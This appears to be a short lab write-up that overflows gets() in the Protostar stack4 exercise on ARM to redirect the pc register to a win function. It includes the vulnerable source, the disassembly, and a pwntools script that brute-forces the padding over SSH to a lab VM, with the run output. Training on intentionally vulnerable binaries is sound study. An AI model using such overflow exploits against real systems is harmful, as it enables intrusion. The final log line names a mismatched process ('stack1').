In this article, we'll rewrite the pc register to take control of the program flow. This can be done though the vulnerable gets function
The source:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()
{
puts("congrats!\n");
}
int main()
{
char buffer[64];
gets(buffer);
puts("nope\n");
}
The goal will be to call win by abusing gets.
The disassembly:
00010404 <win>:
10404: b580 push {r7, lr}
10406: af00 add r7, sp, #0
10408: 4b03 ldr r3, [pc, #12] ; (10418 <win+0x14>)
1040a: 447b add r3, pc
1040c: 4618 mov r0, r3
1040e: f7ff ef82 blx 10314 <puts@plt> ; puts("congrats\n");
10412: bf00 nop
10414: bd80 pop {r7, pc}
10416: bf00 nop
10418: 00000086
0001041c <main>:
1041c: b580 push {r7, lr}
1041e: b090 sub sp, #64 ; 0x40
10420: af00 add r7, sp, #0
10422: 463b mov r3, r7
10424: 4618 mov r0, r3
10426: f7ff ef70 blx 10308 <gets@plt> ; gets(buffer);
1042a: 4b05 ldr r3, [pc, #20] ; (10440 <main+0x24>)
1042c: 447b add r3, pc
1042e: 4618 mov r0, r3
10430: f7ff ef70 blx 10314 <puts@plt>
10434: 2300 movs r3, #0
10436: 4618 mov r0, r3
10438: 3740 adds r7, #64 ; 0x40
1043a: 46bd mov sp, r7
1043c: bd80 pop {r7, pc} ; pc to be overwritten
1043e: bf00 nop
10440: 00000070
This is our exploit:
#!/usr/bin/env python3
import struct
from pwn import *
socket = ssh(host='192.168.0.1', user='root', password='')
i = 60
while True:
i += 1
print('test', i)
payload = b'A' * i + struct.pack('<I', 0x00010404)
process = socket.process('/root/protostarm/stack4/stack4')
process.sendline(payload)
res = ""
while True:
try:
res += process.recv().decode()
except:
break
print(res)
if 'congrats' in res:
break
process.close()
socket.close()
user@Azeria-Lab-VM:~/protoarm/stack4$ ./exploit.py
[+] Connecting to 192.168.0.1 on port 22: Done
[*] root@192.168.0.1:
Distro Debian testing
OS: linux
Arch: arm
Version: 4.9.0
ASLR: Disabled
[*] Stopped remote process 'stack4' on 192.168.0.1 (pid 1185)
test 63
[+] Starting remote process '/root/protostarm/stack4/stack4' on 192.168.0.1: pid 1189
[*] Stopped remote process 'stack4' on 192.168.0.1 (pid 1189)
test 64
[+] Starting remote process '/root/protostarm/stack4/stack4' on 192.168.0.1: pid 1193
[*] Stopped remote process 'stack4' on 192.168.0.1 (pid 1193)
test 65
[+] Starting remote process '/root/protostarm/stack4/stack4' on 192.168.0.1: pid 1197
[*] Stopped remote process 'stack4' on 192.168.0.1 (pid 1197)
test 66
[+] Starting remote process '/root/protostarm/stack4/stack4' on 192.168.0.1: pid 1201
[*] Stopped remote process 'stack4' on 192.168.0.1 (pid 1201)
test 67
[+] Starting remote process '/root/protostarm/stack4/stack4' on 192.168.0.1: pid 1205
[*] Stopped remote process 'stack4' on 192.168.0.1 (pid 1205)
test 68
[+] Starting remote process '/root/protostarm/stack4/stack4' on 192.168.0.1: pid 1209
congrats!
[*] Stopped remote process 'stack1' on 192.168.0.1 (pid 1597)
[*] Closed connection to '192.168.0.1'
Why 68? Well 64 for the buffer and 4 more for r7, the saved frame ptr.
Top comments (0)